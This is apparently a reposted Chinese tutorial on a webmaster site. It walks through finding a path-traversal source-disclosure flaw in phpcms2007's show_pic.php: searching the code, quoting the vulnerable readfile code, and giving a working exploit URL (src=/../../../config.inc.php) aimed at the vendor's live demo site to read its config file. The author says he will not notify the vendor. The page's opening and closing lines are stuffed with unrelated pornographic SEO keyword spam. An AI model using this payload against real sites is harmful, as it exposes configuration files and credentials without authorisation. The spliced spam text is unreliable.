精品免费在线观看-精品欧美-精品欧美成人bd高清在线观看-精品欧美高清不卡在线-精品欧美日韩一区二区

17站長網(wǎng)

17站長網(wǎng) 首頁 安全 安全教程 查看內(nèi)容

關(guān)于簡單的php源代碼泄露漏洞的發(fā)掘

2022-9-24 10:19| 查看: 2390 |來源: 互聯(lián)網(wǎng)

我們知道在asp中出現(xiàn)得最多的還是sql注入,不過在php中由于magic_quotes_gpc為on的情況下特殊字符會被轉(zhuǎn)義,所以即使有很多時候存在sql注入也無法利用。但是php ...

我們知道在asp中出現(xiàn)得最多的還是sql注入,不過在php中由于magic_quotes_gpc為on的情況下特殊字符會被轉(zhuǎn)義,所以即使有很多時候存在sql注入也無法利用。但是php強(qiáng)大的文件操作功能卻使我們能體會到在asp中無法體會的樂趣,我想php自帶的文件操作函數(shù)能讓你為之心跳加快~~嘿嘿 這次我發(fā)掘的是phpcms2007的源代碼泄露漏洞 再次向Phpcms2007的開源行為致敬!! 開始吧, findstr /s /n /i readfile *.php >readfile.txt (結(jié)果我只給出有用的) 其他的文件操作函數(shù)可以自己定義查找 module\picture\show_pic.inc.php:8:readfile($file); 跟進(jìn)這個文件看看吧,呵呵,比較小,我喜歡 [Copy to clipboard] [ - ]CODE:

defined(’IN_PHPCMS’) or exit(’Access Denied’);
require PHPCMS_ROOT.’/module/’.$mod.’/include/common.inc.php’;
isset($src) or exit;
$file = PHPCMS_ROOT.’/’.$PHPCMS[’uploaddir’].’/’.$CHA[’channeldir’].’/’.$MOD[’upload_dir’].’/’.$src;
if(empty($PHP_REFERER) || !strpos($PHP_REFERER, $PHP_DOMAIN)) $file = PHPCMS_ROOT.’/images/error.jpg’;
header("Content-type:image/pjpeg");
readfile($file);
?>
一路分析下。。。 先包含文件/module/’.$mod.’/include/common.inc.php 如果存在變量$src則賦予它路徑并把值交給變量$file 然后就是就進(jìn)入if 這里我不看其他的文件簡單猜測下應(yīng)該是判斷url路徑來源,也就是防盜鏈的功能 然后就header()一個圖片頭 呵呵,輕輕松松就readfile($file); 可以看出它沒有判斷$src的文件類型,如果我們提交一個src=*.php也會被readfile 好吧,在這里漏洞是出現(xiàn)了 不過由于“defined(’IN_PHPCMS’) or exit(’Access Denied’);”,所以我們是無法直接利用這個漏洞文件的 只能是在其他包含這個文件的php文件中利用 繼續(xù)吧 [Copy to clipboard] [ - ]CODE:
findstr /s /i /n show_pic.inc.php *.php >show_pic.inc.php.txt picture\show_pic.php:4:require PHPCMS_ROOT."/module/".$mod."/show_pic.inc.php";
進(jìn)去看看 [Copy to clipboard] [ - ]CODE:

require "./config.inc.php";
require "../include/common.inc.php";
require PHPCMS_ROOT."/module/".$mod."/show_pic.inc.php";
?>
呵呵,要是register_globals為on的話就可以直接利用這個文件讀取目標(biāo)文件了
那就測試吧 官方是演示站是 [Copy to clipboard] [ - ]CODE:
http://demo.phpcms.cn/
那就這樣構(gòu)造url [Copy to clipboard] [ - ]CODE:
/picture/show_pic.php?src=/../../../config.inc.php
嘿嘿,讀取的就是網(wǎng)站的配置文件 直接訪問 [Copy to clipboard] [ - ]CODE:
http://demo.phpcms.cn//picture/show_pic.php?src=/../../../config.inc.php
呵呵,猜測沒錯!! 那我們可以先訪問http://demo.phpcms.cn/抓包 用nc發(fā)包 get選項(xiàng)就設(shè)置為 [Copy to clipboard] [ - ]CODE:
/picture/show_pic.php?src=/../../../config.inc.php
這里我就用刺猬的一個post提交工具代替了 測試結(jié)果如圖 ok,就分析到這里了 希望大家不要利用這個做違法的事,嘿嘿!! 偶是壞孩子,不通知官方了~·好孩子去通知下。

tag標(biāo)簽:php源代碼 泄露漏洞
本文最后更新于 2022-9-24 10:19,某些文章具有時效性,若有錯誤或已失效,請在網(wǎng)站留言或聯(lián)系站長:17tui@17tui.com
·END·
站長網(wǎng)微信號:w17tui,關(guān)注站長、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營銷服務(wù)中心

免責(zé)聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識,文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請勿用于商業(yè)用途,如果損害了您的權(quán)利,請聯(lián)系我們及時修正或刪除。謝謝!

17站長網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級,為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù),與站長一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!

掃一掃,關(guān)注站長網(wǎng)微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 丰满老妇猛交视频 | 色老99久久九九爱精品69堂 | 女人被男人狂躁下面在线观看 | 欧美特黄视频在线观看 | 91精品久久久久含羞草 | 久久精品国产一区二区三区不卡 | 久久精品这里有 | 久久视频精品53在线观看 | 亚洲h视频在线观看 | 国内精自视频品线六区免费 | 色综合亚洲综合网站综合色 | 黄色片网址 | 99久久中文字幕伊人情人 | 色图影院 | 91视频入口| 不卡一级aaa全黄毛片 | 看国产黄色片 | 精品久久久久久国产免费了 | 黄色免费在线观看网址 | 免费看啪啪网站 | 日本成片 | 美女扒开胸露出奶乳免费 | 国内精品一区二区三区最新 | 国产丝袜福利 | 免费看一级a一片毛片 | 性做爰片免费视频毛片中文ilo | 久久一级片 | 国产精品久久毛片 | 在线亚洲色图 | 国产激情一区二区三区在线观看 | 国产人成亚洲第一网站在线播放 | 视频黄色免费 | 亚洲精品亚洲人成在线 | 91福利区 | 日韩欧美小视频 | 亚洲黄色免费 | 国产亚洲精品日韩综合网 | 91亚洲区国产区精品区 | 国产午夜影院 | 亚洲精品入口一区二区乱成人 | 色屁屁影院在线观看 |